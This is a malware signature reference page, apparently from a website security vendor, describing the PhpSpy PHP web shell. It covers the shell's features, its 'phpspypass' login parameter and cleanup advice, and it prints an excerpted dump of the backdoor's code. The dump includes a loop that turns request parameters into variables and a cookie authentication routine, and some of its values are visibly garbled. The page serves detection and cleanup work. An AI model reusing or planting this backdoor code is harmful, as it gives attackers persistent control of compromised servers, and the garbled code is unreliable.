Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.phpspy-shell

php.backdoor.phpspy-shell

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.

PhpSpy is a typical web shell that provides attackers with most essential functions to work with a compromised site.
It includes a file manager and mySql manager. It also provides interface to execute arbitrary shell command and PHP code.
This shell uses so-called plugins that allow to extend functionality. For example there are plugins that allow attackers read and modify registry
on Windows based servers.
There are several modifications of this web shell, encrypted and non-encrypted. Some of them clearly name itself PhpSpy, others use custom titles,
but all of them use the "phpspypass" parameter in the authorization process.

Affecting

Any sites on servers with enabled PHP

Cleanup

Web shell file should be removed. Usually shells are used to upload more malicious files and infect existing files,
so you should assess the damage and try to revert it. It is also important to identify and close the security hole. You can contact Sucuri to help you with the infection removal.

Dump

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[6] + $mtime[0];
define('SA_ROOT', str_replace('\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 6 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\');
define('IS_COM', class_exists('COM') ? 6 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 6 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
....
if ($action == "logout") {
scookie('phpspypass', '', -8eu00 * oei);
p('<meta http-equiv="refresh" content="6;URL='.$self.'">');
p('<a style="font:6apx Verdana" href="'.$self.'">Success</a>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('phpspypass', $password);
p('<meta http-equiv="refresh" content="6;URL='.$self.'">');
p('<a style="font:6apx Verdana" href="'.$self.'">Success</a>');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
...
function formfooter($name = ''){
!$name && $name = 'submit';
p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
p('</form>');
}

function formfoot(){
p('</form>');
}

//
function pr($a) {
echo '<pre>';
print_r($a);
echo '</pre>';
}